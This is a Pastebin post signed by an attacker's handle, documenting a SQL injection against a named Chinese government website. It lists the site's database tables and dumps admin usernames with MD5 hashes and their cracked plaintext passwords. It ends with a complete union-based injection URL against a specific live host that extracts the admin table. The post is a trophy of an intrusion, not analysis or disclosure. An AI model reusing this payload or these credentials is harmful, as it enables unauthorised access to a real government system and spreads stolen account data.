Advertisement
Guest User

Gov.cn Sql injection @QuisterTow

a guest
Feb 10th, 2013
349
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.98 KB | None | 0 0
  1. ================================================
  2. Author : QuisterTow / twitter.com/quistertow
  3. Date : 10 feb 2013
  4. Target : gov.cn
  5. ================================================
  6. /*!Some Tables*/
  7. admin
  8. fgn_faq
  9. fgn_member
  10. fgn_user
  11. gov_bg
  12. gov_bssx
  13. gov_dw
  14. gov_sw
  15. gov_title_class
  16. invest_ip_record
  17. invest_options
  18. invest_subject
  19. invest_user
  20. mail_questions
  21. online_option
  22. /*!End*/
  23.  
  24. /*!Admin columns*/
  25. id
  26. username
  27. password
  28. /*!end*/
  29.  
  30. /*!admin data*/
  31. id : username : password
  32. 1:admin:0192023a7bbd73250516f069df18b500 -cracked=admin123
  33. 2:yanghuolong:84991d0804aac04d4164458925c63cf7 -cracked=yanghuolong
  34. 3:admin:84991d0804aac04d4164458925c63cf7 -cracked=yanghuolong
  35. /*!end*/
  36.  
  37. /*!Injection union based*/
  38.  
  39. http://ac.enghunan.gov.cn/webwork/bszn.php?id=5' and 1=2 UNION SELECT 1,2,group_concat(id,0x3a,username,0x3a,password,0x3a,0x3c2f62723e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from admin-- -
  40.  
  41. /*!end*/
  42.  
  43. @Quistertow
  44.  
  45. www.twitter.com/quistertow
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement